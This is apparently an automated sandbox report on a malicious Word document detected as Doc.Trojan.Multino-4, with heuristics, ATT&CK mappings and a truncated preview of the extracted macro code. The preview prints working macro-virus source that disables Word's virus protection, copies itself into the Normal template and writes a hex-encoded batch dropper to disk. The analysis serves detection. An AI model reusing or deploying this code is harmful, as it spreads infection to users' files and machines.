MALICIOUS
360
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1505.003 Server Software Component: Visual Basic for Applications
T1204.002 Malicious File: User Execution: Malicious File
The sample is a malicious Office document containing VBA macros, specifically identified by ClamAV as 'Doc.Trojan.Multino-4'. The AutoClose macro attempts to export itself to 'c:\logov.sys' and then writes content to 'c:\dropper.scr', suggesting an intent to establish persistence or download and execute a second-stage payload. The use of VBA macros and the 'Shell()' function points to the 'Visual Basic' technique.
Heuristics 7
-
ClamAV: Doc.Trojan.Multino-4 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Multino-4
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 38055 bytes |
SHA-256: 83cf03e46429f10f9d2540b2d902aec18c6c932cb4401fd9902f17469ee2f491 |
|||
|
Detection
ClamAV:
Win.Trojan.C-286
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "MultiNO"
Sub AutoClose()
' MultiNO (Word97 part) '
' 1st BAT/Word97 virus! '
' ----- by FRiZER ----- '
On Error GoTo sys_exp
With Application
.DisplayAlerts = wdAlertsNone
.EnableCancelKey = wdCancelDisabled
.ScreenUpdating = False
End With
ShowVisualBasicEditor = False
Open "c:\logov.sys" For Input As 1
Close 1
GoTo skip_exp
sys_exp:
Application.VBE.ActiveVBProject.VBComponents("MultiNO").Export "c:\logov.sys"
skip_exp:
On Error GoTo complete
If ActiveDocument = "" Then GoTo complete
With Options
.VirusProtection = False
.SaveNormalPrompt = False
.ConfirmConversions = False
End With
ActiveDocument.ReadOnlyRecommended = False
For i = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(i).Name = "MultiNO" Then nt = True
Next i
For i = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(i).Name = "MultiNO" Then ad = True
Next i
If ad = False Then
ActiveDocument.VBProject.VBComponents.Import ("c:\logov.sys")
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
End If
If nt = False Then NormalTemplate.VBProject.VBComponents.Import ("c:\logov.sys")
Open "c:\dropper.scr" For Output As 1
Print #1, "N dropper.bat"
Print #1, "e0100 0D 0A 0D 0A 0D 0A 0D 0A 0D 0A 0D 0A 0D 0A 0D 0A"
Print #1, "e0110 0D 0A 0D 0A 0D 0A 0D 0A 0D 0A 0D 0A 0D 0A 0D 0A"
Print #1, "e0120 0D 0A 0D 0A 0D 0A 0D 0A 0D 0A 0D 0A 0D 0A 40 65"
Print #1, "e0130 63 68 6F 20 6F 66 66 0D 0A 73 65 74 20 76 3D 25"
Print #1, "e0140 30 0D 0A 69 66 20 6E 6F 74 20 65 78 69 73 74 20"
Print #1, "e0150 25 76 25 20 73 65 74 20 76 3D 25 76 25 2E 62 61"
Print #1, "e0160 74 0D 0A 61 72 6A 20 65 20 2D 79 20 25 76 25 3E"
Print #1, "e0170 6E 75 6C 0D 0A 63 61 6C 6C 20 5F 6D 75 6C 74 69"
Print #1, "e0180 6E 6F 2E 62 61 74 0D 0A 73 65 74 20 76 3D 0D 0A"
Print #1, "e0190 64 65 6C 20 5F 2A 2E 2A 3E 6E 75 6C 1A 60 EA 2C"
Print #1, "e01A0 00 1E 04 01 00 10 00 02 F1 F1 76 6F 27 00 00 00"
Print #1, "e01B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5F"
Print #1, "e01C0 4D 55 4C 54 49 4E 4F 2E 41 52 4A 00 00 56 07 9B"
Print #1, "e01D0 B5 00 00 60 EA 2C 00 1E 04 01 00 10 01 00 F1 A0"
Print #1, "e01E0 69 6D 25 DD 00 00 00 8C 01 00 00 28 AB F0 FF 00"
Print #1, "e01F0 00 20 00 00 00 5F 4D 41 4B 45 44 52 50 2E 42 41"
Print #1, "e0200 54 00 00 7E 2F 2A CA 00 00 00 D7 5A 97 AD B5 0D"
Print #1, "e0210 E7 A1 7B FE 60 DC 3A 85 DA BC 94 5A A0 86 E3 45"
Print #1, "e0220 07 96 84 25 92 48 C4 BA 7E 32 7E 0B 51 1F 1B 76"
Print #1, "e0230 D5 BB 37 2A 40 01 A4 9F 72 91 E8 20 2B 5C F3 45"
Print #1, "e0240 44 0F EC EF AE DF 28 0B 20 7F BA AD F0 6A 20 31"
Print #1, "e0250 DF 87 8A D6 D4 2A 79 9A B0 70 90 2B E1 B1 20 D2"
Print #1, "e0260 FD 36 EA A7 50 30 48 40 DB CD 40 BF 00 36 E9 5E"
Print #1, "e0270 4D 70 D2 91 C5 17 99 1E 05 27 86 BC 2C 74 AF CA"
Print #1, "e0280 9B 8C 5E 30 E8 AE DB C5 83 DB 4C 70 8F F4 66 BB"
Print #1, "e0290 80 CF BE 4C 6B A3 4D C7 2A 39 4D 9E 1E B8 C6 71"
Print #1, "e02A0 EF 53 56 CD 81 D5 56 DD B6 72 41 14 43 F0 CF 6B"
Print #1, "e02B0 3F C5 4A AE 93 3A 4B F5 E6 83 9A D4 EE 7C F3 16"
Print #1, "e02C0 0F 50 66 17 D2 DA E4 86 8A F4 7E A8 39 73 EB F2"
Print #1, "e02D0 12 E3 C6 8C D0 D0 6F 71 82 54 E4 F0 27 2F CF E7"
Print #1, "e02E0 87 E7 8F 93 59 94 60 EA 2C 00 1E 04 01 00 10 01"
Print #1, "e02F0 00 F1 A0 69 6D 25 30 02 00 00 0B 05 00 00 61 30"
Print #1, "e0300 1E 9A 00 00 20 00 00 00 5F 4D 55 4C 54 49 4E 4F"
Print #1, "e0310 2E 42 41 53 00 00 BB CC 0A 2F 00 00 02 0E 62 97"
Print #1, "e0320 B2 26 E4 B8 E8 39 FF AD C0 8A 12 F5 1C 2A 54 26"
Print #1, "e0330 07 2C E6 89 4B CC 18 D6 05 28 43 5E DF C9 36 DD"
Print #1, "e0340 ED DD 37 7F CA BE 39 7F 7B 98 C8 58 C4 29 6D 2E"
Print #1, "e0350 1
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.